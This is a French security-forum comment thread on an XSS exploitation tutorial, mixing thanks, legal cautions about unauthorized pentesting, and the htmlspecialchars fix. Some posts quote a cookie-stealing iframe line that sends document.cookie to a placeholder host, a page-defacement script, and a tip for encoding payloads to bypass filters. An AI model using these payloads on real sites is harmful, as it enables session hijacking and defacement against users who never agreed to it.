Comment est exploitée une faille XSS

Di0Sasm · (Modification du message : 17-10-2011, 23h45 par Di0Sasm.)

Très bon tutos Wink

Di0Sasm · (Modification du message : 17-10-2011, 23h46 par Di0Sasm.)

Merci :-)
Je vais essayer de vous en pondre au moins 1 par semaine ... quoique si je peux en faire plus, ça va me faire plaisir :-). J'ai l'intention de faire le tour de toutes mes connaissances à l'écrit. Je me rends compte que j’ai accumulé beaucoup de bagage avec le temps. C’est moche d’avoir tout perdu ceux que j’ai composés pour NewbieCenter … :-(

Apache9 · 23-04-2012, 11h55

Merci très bon tutoriel, par contre je reçois le mail 5 par 5 normale ? ^^ Par exemple je lance l'exploit et après je reçois 5 fois le mail "Exploitation XSS".

ﮎyиthﮎtyℓє · (Modification du message : 06-05-2012, 14h54 par ﮎyиthﮎtyℓє.)

parce-que le code et afficher à plusieurs endroit sur ta page.

btw

Code :
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>pwnd</h1></div>";</script>

ça s'du deface.

30-05-2012, 23h34

Merci, très beau tutoriel !

ThibauT · 10-06-2012, 17h26

J'aime tes tutoriels. Ils expliquent simplement des choses qui ne le sont pas forcément.

hydegollam · 29-06-2012, 19h56

Malin le coup des images d'avatar ou du BBcode !
Merci bien pour le tuto Smile

spgb · 20-08-2012, 10h18

Bon tutoriel, merci, j'avais déjà lu d'autres tutoriel du genre mais le tiens va effectivement plus loin Wink

InstinctHack · 17-10-2012, 09h18

Bon tuto, il manque seulement la correction de cette faille qui est simple :
Utiliser de façon systématique la fonction htmlspecialchars ou htmlentities sur les données non sûres (venant des users) avant leur AFFICHAGE, et seulement l'affichage, pas le stockage.

27-10-2012, 17h53

J'ai essayé sur un site, mais pas de boîte de dialogue ouverte Sad

Mais, une erreur sql : Erreur:

Code :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') blabla...

Ca sent la faille sql à plein nez, nan ? Smile

Les outils tel sqlmap permettent je pense de détecter ce type de faille, mais laisse de nombreuses traces de requêtes si je ne me trompe pas ?

***supersnail*** · 28-10-2012, 09h51

Uep, ça laisse pas mal de traces.

Sinon, évite de faire du pentest sauvage sur des sites au hasard parce qu'en plus de pas trop être dans l'esprit de la communauté, tu risques pas mal d'ennuis si l'admin du site est un poil susceptible (il peut t'attaquer pour intrusion, même si t'as pas de motivations malveillantes)

btw @CyberSee, ce serait cool si tu pouvais edit le tuto pour éviter d'inciter les débutants à faire du pentest sauvage Wink

28-10-2012, 14h32

Hello,

Qui a dit que j'ai fait du pentest sauvage ? Rolleyes

Je n'ai rien fait du tout pour l'instant, à part modifier l'url pour tester la sécurité, et j'suis tomber sur une erreur sql, rien de plus Wink

Swissky · 28-10-2012, 14h38

JUstement si tu as modifié l'url pour tester la sécu sans en avoir préalablement averti le webmaster c'est du Pentest Sauvage

Wabouz · 31-12-2012, 13h17

À quoi correspond le fichier cookie.js?

***supersnail*** · 31-12-2012, 13h19

Citation :Dans le fichier cookie.js, nous allons ouvrire un IFRAME qui inclura en variable le cookie de la personne. Voici le codage.

Code :
document.write('<iframe src=http://tonsite.com/cookie.php?cookie='+document.cookie+' HEIGHT=0 WIDTH=0></iframe>');

Je pense que ça répond à la question :>

Wabouz · 31-12-2012, 13h21

Nan justement c'est de là que vient ma question, doit-on créer ce fichier? ou est-ce qu'on le trouve à un endroit?

Swissky · 31-12-2012, 13h23

On doit le créer il sert a recuperer le cookie via la fonction JAVASCRIPT : document.cookie puis fait une redirection sur une page avec le cookie en parametre GET (cf: GET et POST en PHP) Wink

Wabouz · 31-12-2012, 13h26

D'accooooord, okay, merci beaucoup Smile

***supersnail*** · 31-12-2012, 13h26

Ben le fichier cookie.js contient le code qui a été écrit (donc c'est à toi de le créer Wink

).

Enfin la faille elle permet à l'attaquant d'exécuter un javascript de son choix, qui peut être un "cookie stealer" (comme le montre CyberSee), mais sinon ça pourrait être un truc plus dangereux du genre une sorte de worm (comme a connu myspace y'a quelques années), ou pire, une sorte de page de "phishing" (principe en quelque sorte repris dans les "webinject" réalisés par les trojan de type banker, mais là je m'égare...).

Enfin bref, la XSS te permet d'exécuter n'importe quel bout de code JS de ton choix sur le site "victime" (bien sûr pour profiter pleinement des XSS, c'est mieux d'avoir de solides connaissances en javascript Wink

)

***CyberSee*** · 03-01-2013, 15h19

Citation :(bien sûr pour profiter pleinement des XSS, c'est mieux d'avoir de solides connaissances en javascript Wink )

lol effectivement!

Ettorhake · 06-01-2013, 11h30

Merci pour le tuto CyberSee !

freekiss · 10-01-2013, 13h52

Merci pour ce tuto plus complet que ceux que l'on vois généralement.

sakiir · 11-01-2013, 01h05

A par le Cour qui est très bien le titre,lui, n'est pas très bien exprimé si je peux me permettre .. :p
Un "Comment exploiter une faille XSS" aurait été mieux Smile

InstinctHack · 11-01-2013, 14h15

Sakiir, concernant le titre, c'était auparavant celui-là, mais il as était changer, car il mettez en doute l'orientation de la communauté.

***CyberSee*** · 11-01-2013, 17h28

Effectivement, c'est ce que j'avais mis au départ ;-)

Swissky · 11-01-2013, 17h50

Alors on pourrais le changer en "Comment est exploitée une faille XSS" d'ailleurs le titre sur le forum est different de celui qui s'affiche sur la page :

Comment est exploiter une faille XSS
RE: Comment exploiter une faille XSS

sakiir · 11-01-2013, 20h25

ah oui je comprend , enfin c'est exploité quand même :p

03-06-2013, 16h32

Sorry pour le déterrage. Régulièrement, des sites utilisent des systèmes de remplacement de caractère pour empêcher l'XSS. Souvent <h1>XSS</h1> va ce transformer en quelque chose comme _h1_XSS_/h1_. Pour bypasser ce genre de système, vous pouvez encoder votre requête: escape html.

A noter que le javascript n'est pas le seul moyen d'exploiter une XSS. Tout langage exécuté coté client peut exploiter une XSS. La balise <h1>XSS</h1> exploit potentiellement une vulnérabilité XSS même si l'intérêt est limité. Les Iframes font des dégâts.

Aussi, il existe deux types d'XSS. Les XSS qu'on retrouve souvent dans les fonctions recherches sont les XSS non stockées, cela signifie que l'exploitation de l'XSS n'est pas systématique ainsi que les XSS stockées, elles seront exécutés à chaque chargement de la page. Elles sont souvent stockées en base de données.

CronosDark · 03-06-2013, 19h06

Merci pour les TRES bon tutoriel ! =)

Mazaki · 03-06-2013, 19h14

En effet, très bon tutoriel malgré que celui ci ne parle pas de la XSS stockée, qui s'avère encore plus dangereuse qui est (comme notre amis 0pc0deFR l'a si bien dit) stockée généralement dans les bases de données qui peuvent contenir des iframes phishing, drive by download, enfin tout est possible avec ces failles XSS, il n'y a pas que le fait de faire des alertes, ce sont des failles extrêmement courantes et dangereuses.

A méditer

gruik · 03-06-2013, 21h09

yep excellentissime, la page wikipedia est elle même encore mieux documentée, et en français en plus
la seule chose qui manque finalement dans la très large majorité des tutos sur des failles archi-connues et archi-tutorialisées par les débutants, ce sont des bouts de code permettant de montrer un exemple de code vulnérable et de code safe pour aider à mieux comprendre

valtena · 14-06-2013, 22h43

(03-06-2013, 21h09)gruik a écrit : la seule chose qui manque finalement dans la très large majorité des tutos sur des failles archi-connues et archi-tutorialisées par les débutants, ce sont des bouts de code permettant de montrer un exemple de code vulnérable et de code safe pour aider à mieux comprendre

J'avoue.Par contre, pour se protéger l'exploitation de la faille avec les images, il suffit de sécuriser les images qui peuvent être modifié par l'utilisateur. Les autres, c'est inutile, c'est bien ça ?

thxer · 15-06-2013, 09h33

Pour faire réellement le tour de la question voici un ''vrai'' tuto complet :

http://venom630.free.fr/geo/tutz/securit...tique/xss/

Ambrosios · 02-12-2014, 23h09

Très complet. Merci beaucoup, je ne sais pas si je vais l'exploiter tout de suite (autrement que sur moi) mais au moins, je me coucherai moins bête ce soir Smile

Merci encore CyberSee pour ce magnifique tuto

gruik · 03-12-2014, 00h12

ce CyberSee quel bel homme décidément Smile

attention au déterrage de topic encore une fois, pareil dernier post juin 2013...

Ambrosios · 03-12-2014, 00h26

Okay désolé, j'ai pas fait gaffe…

***CyberSee*** · 01-09-2015, 16h07

Je sais que je m’apprête à commenter sur un événement qui s’est passé en 2014 ... mais je tiens à clarifier un truc.

Enfaite, la règle de déterrage de topique ne s'applique pas à la zone des tutos ... Peut importe quand le tuto est écrit, si quelqu'un a une question, elle ne sera jamais mieux classée qu'en commentaire de ce dernier et ce peut importe la date auquel il est écrit. Tant que le commentaire reste constructif ou informatif et ajoute une plus value à la conversation, je n’ai aucun problème avec ça.

Identifiant Mot de passe
S’enregistrer \| Mot de passe oublié ? Se rappeler